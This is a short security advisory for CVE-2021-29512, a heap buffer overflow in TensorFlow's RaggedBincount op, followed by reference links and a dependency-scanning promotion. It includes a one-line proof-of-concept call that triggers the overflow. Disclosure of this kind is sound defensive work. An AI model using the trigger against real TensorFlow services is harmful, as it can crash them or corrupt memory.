CVE-2021-29512: Heap buffer overflow in `RaggedBinCount`
(updated )
If the splits
argument of RaggedBincount
does not specify a valid SparseTensor
, then an attacker can trigger a heap buffer overflow:
import tensorflow as tf
tf.raw_ops.RaggedBincount(splits=[0], values=[1,1,1,1,1], size=5, weights=[1,2,3,4], binary_output=False)
References
- github.com/advisories/GHSA-4278-2v5v-65r4
- github.com/pypa/advisory-database/tree/main/vulns/tensorflow-cpu/PYSEC-2021-440.yaml
- github.com/pypa/advisory-database/tree/main/vulns/tensorflow-gpu/PYSEC-2021-638.yaml
- github.com/pypa/advisory-database/tree/main/vulns/tensorflow/PYSEC-2021-149.yaml
- github.com/tensorflow/tensorflow/commit/eebb96c2830d48597d055d247c0e9aebaea94cd5
- github.com/tensorflow/tensorflow/security/advisories/GHSA-4278-2v5v-65r4
- nvd.nist.gov/vuln/detail/CVE-2021-29512
Detect and mitigate CVE-2021-29512 with GitLab Dependency Scanning
Secure your software supply chain by verifying that all open source dependencies used in your projects contain no disclosed vulnerabilities. Learn more about Dependency Scanning →